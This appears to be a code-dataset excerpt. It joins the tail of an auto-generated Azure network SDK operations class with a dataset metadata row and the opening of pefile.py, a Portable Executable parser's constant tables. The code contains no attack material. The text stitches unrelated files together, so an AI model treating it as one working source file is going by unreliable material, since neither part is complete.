:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified interface endpoint.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.InterfaceEndpoint"
"""Gets the specified interface endpoint by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: InterfaceEndpoint, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_12_01.models.InterfaceEndpoint
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
parameters, # type: "models.InterfaceEndpoint"
**kwargs # type: Any
):
# type: (...) -> "models.InterfaceEndpoint"
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'InterfaceEndpoint')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
parameters, # type: "models.InterfaceEndpoint"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Creates or updates an interface endpoint in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param parameters: Parameters supplied to the create or update interface endpoint operation.
:type parameters: ~azure.mgmt.network.v2018_12_01.models.InterfaceEndpoint
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either InterfaceEndpoint or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_12_01.models.InterfaceEndpoint]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.InterfaceEndpointListResult"]
"""Gets all interface endpoints in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_12_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
def list_by_subscription(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.InterfaceEndpointListResult"]
"""Gets all interface endpoints in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_12_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
| 47.903846 | 205 | 0.662385 |
5622133ff54778788672e8fc9bab2a6f58cc0977 | 207,294 | py | Python | python/pefile.py | omarghader/pefile-go | b1abcb010d7d45cfcbe572dc15e315cf6f55c859 | [
"MIT"
] | 16 | 2016-08-08T13:17:12.000Z | 2021-04-01T20:00:54.000Z | python/pefile.py | Neo23x0/pefile-go | deef81088a615886265cbccfcbbcacb9280b96b1 | [
"MIT"
] | 1 | 2017-07-16T18:45:14.000Z | 2019-03-14T08:43:31.000Z | python/pefile.py | Neo23x0/pefile-go | deef81088a615886265cbccfcbbcacb9280b96b1 | [
"MIT"
] | 5 | 2018-03-14T22:26:42.000Z | 2019-09-29T00:50:17.000Z | # -*- coding: latin-1 -*-
"""pefile, Portable Executable reader module
All the PE file basic structures are available with their default names
as attributes of the instance returned.
Processed elements such as the import table are made available with lowercase
names, to differentiate them from the upper case basic structure names.
pefile has been tested against the limits of valid PE headers, that is, malware.
Lots of packed malware attempt to abuse the format way beyond its standard use.
To the best of my knowledge most of the abuses are handled gracefully.
Copyright (c) 2005-2013 Ero Carrera <ero.carrera@gmail.com>
All rights reserved.
For detailed copyright information see the file COPYING in
the root of the distribution archive.
"""
__revision__ = "$LastChangedRevision$"
__author__ = 'Ero Carrera'
__version__ = '1.2.10-9'
__contact__ = 'ero.carrera@gmail.com'
import os
import struct
import time
import math
import re
import exceptions
import string
import array
import mmap
import ordlookup
sha1, sha256, sha512, md5 = None, None, None, None
try:
import hashlib
sha1 = hashlib.sha1
sha256 = hashlib.sha256
sha512 = hashlib.sha512
md5 = hashlib.md5
except ImportError:
try:
import sha
sha1 = sha.new
except ImportError:
pass
try:
import md5
md5 = md5.new
except ImportError:
pass
try:
enumerate
except NameError:
def enumerate(iter):
L = list(iter)
return zip(range(0, len(L)), L)
def is_bytearray_available():
if isinstance(__builtins__, dict):
return ('bytearray' in __builtins__)
return ('bytearray' in __builtins__.__dict__)
fast_load = False
# This will set a maximum length of a string to be retrieved from the file.
# It's there to prevent loading massive amounts of data from memory mapped
# files. Strings longer than 1MB should be rather rare.
MAX_STRING_LENGTH = 0x100000 # 2^20
IMAGE_DOS_SIGNATURE = 0x5A4D
IMAGE_DOSZM_SIGNATURE = 0x4D5A
IMAGE_NE_SIGNATURE = 0x454E
IMAGE_LE_SIGNATURE = 0x454C
IMAGE_LX_SIGNATURE = 0x584C
IMAGE_TE_SIGNATURE = 0x5A56 # Terse Executables have a 'VZ' signature
IMAGE_NT_SIGNATURE = 0x00004550
IMAGE_NUMBEROF_DIRECTORY_ENTRIES= 16
IMAGE_ORDINAL_FLAG = 0x80000000L
IMAGE_ORDINAL_FLAG64 = 0x8000000000000000L
OPTIONAL_HEADER_MAGIC_PE = 0x10b
OPTIONAL_HEADER_MAGIC_PE_PLUS = 0x20b
directory_entry_types = [
('IMAGE_DIRECTORY_ENTRY_EXPORT', 0),
('IMAGE_DIRECTORY_ENTRY_IMPORT', 1),
('IMAGE_DIRECTORY_ENTRY_RESOURCE', 2),
('IMAGE_DIRECTORY_ENTRY_EXCEPTION', 3),
('IMAGE_DIRECTORY_ENTRY_SECURITY', 4),
('IMAGE_DIRECTORY_ENTRY_BASERELOC', 5),
('IMAGE_DIRECTORY_ENTRY_DEBUG', 6),
('IMAGE_DIRECTORY_ENTRY_COPYRIGHT', 7), # Architecture on non-x86 platforms
('IMAGE_DIRECTORY_ENTRY_GLOBALPTR', 8),
('IMAGE_DIRECTORY_ENTRY_TLS', 9),
('IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG', 10),
('IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT', 11),
('IMAGE_DIRECTORY_ENTRY_IAT', 12),
('IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT', 13),
('IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR',14),
('IMAGE_DIRECTORY_ENTRY_RESERVED', 15) ]
DIRECTORY_ENTRY = dict([(e[1], e[0]) for e in directory_entry_types]+directory_entry_types)
image_characteristics = [
('IMAGE_FILE_RELOCS_STRIPPED', 0x0001),
('IMAGE_FILE_EXECUTABLE_IMAGE', 0x0002),
('IMAGE_FILE_LINE_NUMS_STRIPPED', 0x0004),
('IMAGE_FILE_LOCAL_SYMS_STRIPPED', 0x0008),
('IMAGE_FILE_AGGRESIVE_WS_TRIM', 0x0010),
('IMAGE_FILE_LARGE_ADDRESS_AWARE', 0x0020),
('IMAGE_FILE_16BIT_MACHINE', 0x0040),
('IMAGE_FILE_BYTES_REVERSED_LO', 0x0080),
('IMAGE_FILE_32BIT_MACHINE', 0x0100),
('IMAGE_FILE_DEBUG_STRIPPED', 0x0200),
('IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP', 0x0400),
('IMAGE_FILE_NET_RUN_FROM_SWAP', 0x0800),
('IMAGE_FILE_SYSTEM', 0x1000),
('IMAGE_FILE_DLL', 0x2000),
('IMAGE_FILE_UP_SYSTEM_ONLY', 0x4000),
('IMAGE_FILE_BYTES_REVERSED_HI', 0x8000) ]
IMAGE_CHARACTERISTICS = dict([(e[1], e[0]) for e in
image_characteristics]+image_characteristics)
section_characteristics = [
('IMAGE_SCN_TYPE_REG', 0x00000000), # reserved
('IMAGE_SCN_TYPE_DSECT', 0x00000001), # reserved
('IMAGE_SCN_TYPE_NOLOAD', 0x00000002), # reserved
('IMAGE_SCN_TYPE_GROUP', 0x00000004), # reserved
('IMAGE_SCN_TYPE_NO_PAD', 0x00000008), # reserved
('IMAGE_SCN_TYPE_COPY', 0x00000010), # reserved
('IMAGE_SCN_CNT_CODE', 0x00000020),
('IMAGE_SCN_CNT_INITIALIZED_DATA', 0x00000040),
('IMAGE_SCN_CNT_UNINITIALIZED_DATA', 0x00000080),
('IMAGE_SCN_LNK_OTHER', 0x00000100),
('IMAGE_SCN_LNK_INFO', 0x00000200),
('IMAGE_SCN_LNK_OVER', 0x00000400), # reserved
('IMAGE_SCN_LNK_REMOVE', 0x00000800),
('IMAGE_SCN_LNK_COMDAT', 0x00001000),
('IMAGE_SCN_MEM_PROTECTED', 0x00004000), # obsolete
('IMAGE_SCN_NO_DEFER_SPEC_EXC', 0x00004000),
('IMAGE_SCN_GPREL', 0x00008000),
('IMAGE_SCN_MEM_FARDATA', 0x00008000),
('IMAGE_SCN_MEM_SYSHEAP', 0x00010000), # obsolete
('IMAGE_SCN_MEM_PURGEABLE', 0x00020000),
('IMAGE_SCN_MEM_16BIT', 0x00020000),
('IMAGE_SCN_MEM_LOCKED', 0x00040000),
('IMAGE_SCN_MEM_PRELOAD', 0x00080000),
('IMAGE_SCN_ALIGN_1BYTES', 0x00100000),
('IMAGE_SCN_ALIGN_2BYTES', 0x00200000),
('IMAGE_SCN_ALIGN_4BYTES', 0x00300000),
('IMAGE_SCN_ALIGN_8BYTES', 0x00400000),
('IMAGE_SCN_ALIGN_16BYTES', 0x00500000), # default alignment
('IMAGE_SCN_ALIGN_32BYTES', 0x00600000),
('IMAGE_SCN_ALIGN_64BYTES', 0x00700000),
('IMAGE_SCN_ALIGN_128BYTES', 0x00800000),
('IMAGE_SCN_ALIGN_256BYTES', 0x00900000),
('IMAGE_SCN_ALIGN_512BYTES', 0x00A00000),
('IMAGE_SCN_ALIGN_1024BYTES', 0x00B00000),
('IMAGE_SCN_ALIGN_2048BYTES', 0x00C00000),
('IMAGE_SCN_ALIGN_4096BYTES', 0x00D00000),
('IMAGE_SCN_ALIGN_8192BYTES', 0x00E00000),
('IMAGE_SCN_ALIGN_MASK', 0x00F00000),
('IMAGE_SCN_LNK_NRELOC_OVFL', 0x01000000),
('IMAGE_SCN_MEM_DISCARDABLE', 0x02000000),
('IMAGE_SCN_MEM_NOT_CACHED', 0x04000000),
('IMAGE_SCN_MEM_NOT_PAGED', 0x08000000),
('IMAGE_SCN_MEM_SHARED', 0x10000000),
('IMAGE_SCN_MEM_EXECUTE', 0x20000000),
('IMAGE_SCN_MEM_READ', 0x40000000),
('IMAGE_SCN_MEM_WRITE', 0x80000000L) ]
SECTION_CHARACTERISTICS = dict([(e[1], e[0]) for e in
section_characteristics]+section_characteristics)
debug_types = [
('IMAGE_DEBUG_TYPE_UNKNOWN', 0),
('IMAGE_DEBUG_TYPE_COFF', 1),
('IMAGE_DEBUG_TYPE_CODEVIEW', 2),
('IMAGE_DEBUG_TYPE_FPO', 3),
('IMAGE_DEBUG_TYPE_MISC', 4),
('IMAGE_DEBUG_TYPE_EXCEPTION', 5),
('IMAGE_DEBUG_TYPE_FIXUP', 6),
('IMAGE_DEBUG_TYPE_OMAP_TO_SRC', 7),
('IMAGE_DEBUG_TYPE_OMAP_FROM_SRC', 8),
('IMAGE_DEBUG_TYPE_BORLAND', 9),
('IMAGE_DEBUG_TYPE_RESERVED10', 10),
('IMAGE_DEBUG_TYPE_CLSID', 11) ]
DEBUG_TYPE = dict([(e[1], e[0]) for e in debug_types]+debug_types)
subsystem_types = [
('IMAGE_SUBSYSTEM_UNKNOWN', 0),
('IMAGE_SUBSYSTEM_NATIVE', 1),
('IMAGE_SUBSYSTEM_WINDOWS_GUI', 2),
('IMAGE_SUBSYSTEM_WINDOWS_CUI', 3),
('IMAGE_SUBSYSTEM_OS2_CUI', 5),
('IMAGE_SUBSYSTEM_POSIX_CUI', 7),
('IMAGE_SUBSYSTEM_NATIVE_WINDOWS', 8),
('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', 9),
('IMAGE_SUBSYSTEM_EFI_APPLICATION', 10),
('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', 11),
('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', 12),
('IMAGE_SUBSYSTEM_EFI_ROM', 13),
('IMAGE_SUBSYSTEM_XBOX', 14),
('IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION', 16)]
SUBSYSTEM_TYPE = dict([(e[1], e[0]) for e in subsystem_types]+subsystem_types)
machine_types = [
('IMAGE_FILE_MACHINE_UNKNOWN', 0),
('IMAGE_FILE_MACHINE_I386', 0x014c),
('IMAGE_FILE_MACHINE_R3000', 0x0162),
('IMAGE_FILE_MACHINE_R4000', 0x0166),
('IMAGE_FILE_MACHINE_R10000', 0x0168),
('IMAGE_FILE_MACHINE_WCEMIPSV2',0x0169),
('IMAGE_FILE_MACHINE_ALPHA', 0x0184),
('IMAGE_FILE_MACHINE_SH3', 0x01a2),
('IMAGE_FILE_MACHINE_SH3DSP', 0x01a3),
('IMAGE_FILE_MACHINE_SH3E', 0x01a4),
('IMAGE_FILE_MACHINE_SH4', 0x01a6),
('IMAGE_FILE_MACHINE_SH5', 0x01a8),
('IMAGE_FILE_MACHINE_ARM', 0x01c0),
('IMAGE_FILE_MACHINE_THUMB', 0x01c2),
('IMAGE_FILE_MACHINE_ARMNT', 0x01c4),
('IMAGE_FILE_MACHINE_AM33', 0x01d3),
('IMAGE_FILE_MACHINE_POWERPC', 0x01f0),
('IMAGE_FILE_MACHINE_POWERPCFP',0x01f1),
('IMAGE_FILE_MACHINE_IA64', 0x0200),
('IMAGE_FILE_MACHINE_MIPS16', 0x0266),
('IMAGE_FILE_MACHINE_ALPHA64', 0x0284),
('IMAGE_FILE_MACHINE_AXP64', 0x0284), # same
('IMAGE_FILE_MACHINE_MIPSFPU', 0x0366),
('IMAGE_FILE_MACHINE_MIPSFPU16',0x0466),
('IMAGE_FILE_MACHINE_TRICORE', 0x0520),
('IMAGE_FILE_MACHINE_CEF', 0x0cef),
('IMAGE_FILE_MACHINE_EBC', 0x0ebc),
('IMAGE_FILE_MACHINE_AMD64', 0x8664),
('IMAGE_FILE_MACHINE_M32R', 0x9041),
('IMAGE_FILE_MACHINE_CEE', 0xc0ee),
]
MACHINE_TYPE = dict([(e[1], e[0]) for e in machine_types]+machine_types)
relocation_types = [
('IMAGE_REL_BASED_ABSOLUTE', 0),
('IMAGE_REL_BASED_HIGH', 1),
('IMAGE_REL_BASED_LOW', 2),
('IMAGE_REL_BASED_HIGHLOW', 3),
('IMAGE_REL_BASED_HIGHADJ', 4),
('IMAGE_REL_BASED_MIPS_JMPADDR', 5),
('IMAGE_REL_BASED_SECTION', 6),
('IMAGE_REL_BASED_REL', 7),
('IMAGE_REL_BASED_MIPS_JMPADDR16', 9),
('IMAGE_REL_BASED_IA64_IMM64', 9),
('IMAGE_REL_BASED_DIR64', 10),
('IMAGE_REL_BASED_HIGH3ADJ', 11) ]
RELOCATION_TYPE = dict([(e[1], e[0]) for e in relocation_types]+relocation_types)
dll_characteristics = [
('IMAGE_LIBRARY_PROCESS_INIT', 0x0001), # reserved
('IMAGE_LIBRARY_PROCESS_TERM', 0x0002), # reserved
('IMAGE_LIBRARY_THREAD_INIT', 0x0004), # reserved
('IMAGE_LIBRARY_THREAD_TERM', 0x0008), # reserved
('IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA', 0x0020),
('IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE', 0x0040),
('IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY', 0x0080),
('IMAGE_DLLCHARACTERISTICS_NX_COMPAT', 0x0100),
('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', 0x0200),
('IMAGE_DLLCHARACTERISTICS_NO_SEH', 0x0400),
('IMAGE_DLLCHARACTERISTICS_NO_BIND', 0x0800),
('IMAGE_DLLCHARACTERISTICS_APPCONTAINER', 0x1000),
('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', 0x2000),
('IMAGE_DLLCHARACTERISTICS_GUARD_CF', 0x4000),
('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', 0x8000) ]
DLL_CHARACTERISTICS = dict([(e[1], e[0]) for e in dll_characteristics]+dll_characteristics)
# Resource types
resource_type = [
('RT_CURSOR', 1),
('RT_BITMAP', 2),
('RT_ICON', 3),
('RT_MENU', 4),
('RT_DIALOG', 5),
('RT_STRING', 6),
('RT_FONTDIR', 7),
('RT_FONT', 8),
('RT_ACCELERATOR', 9),
('RT_RCDATA', 10),
('RT_MESSAGETABLE', 11),
('RT_GROUP_CURSOR', 12),
('RT_GROUP_ICON', 14),
('RT_VERSION', 16),
('RT_DLGINCLUDE', 17),
('RT_PLUGPLAY', 19),
('RT_VXD', 20),
('RT_ANICURSOR', 21),
('RT_ANIICON', 22),
('RT_HTML', 23),
('RT_MANIFEST', 24) ]
RESOURCE_TYPE = dict([(e[1], e[0]) for e in resource_type]+resource_type)
# Language definitions
lang = [
('LANG_NEUTRAL', 0x00),
('LANG_INVARIANT', 0x7f),
('LANG_AFRIKAANS', 0x36),
('LANG_ALBANIAN', 0x1c),
('LANG_ARABIC', 0x01),
('LANG_ARMENIAN', 0x2b),
('LANG_ASSAMESE', 0x4d),
('LANG_AZERI', 0x2c),
('LANG_BASQUE', 0x2d),
('LANG_BELARUSIAN', 0x23),
('LANG_BENGALI', 0x45),
('LANG_BULGARIAN', 0x02),
('LANG_CATALAN', 0x03),
('LANG_CHINESE', 0x04),
('LANG_CROATIAN', 0x1a),
('LANG_CZECH', 0x05),
('LANG_DANISH', 0x06),
('LANG_DIVEHI', 0x65),
('LANG_DUTCH', 0x13),
('LANG_ENGLISH', 0x09),
('LANG_ESTONIAN', 0x25),
('LANG_FAEROESE', 0x38),
('LANG_FARSI', 0x29),
('LANG_FINNISH', 0x0b),
('LANG_FRENCH', 0x0c),
('LANG_GALICIAN', 0x56),
('LANG_GEORGIAN', 0x37),
('LANG_GERMAN', 0x07),
('LANG_GREEK', 0x08),
('LANG_GUJARATI', 0x47),
('LANG_HEBREW', 0x0d),
('LANG_HINDI', 0x39),
('LANG_HUNGARIAN', 0x0e),
('LANG_ICELANDIC', 0x0f),
('LANG_INDONESIAN', 0x21),
('LANG_ITALIAN', 0x10),
('LANG_JAPANESE', 0x11),
('LANG_KANNADA', 0x4b),
('LANG_KASHMIRI', 0x60),
('LANG_KAZAK', 0x3f),
('LANG_KONKANI', 0x57),
('LANG_KOREAN', 0x12),
('LANG_KYRGYZ', 0x40),
('LANG_LATVIAN', 0x26),
('LANG_LITHUANIAN', 0x27),
('LANG_MACEDONIAN', 0x2f),
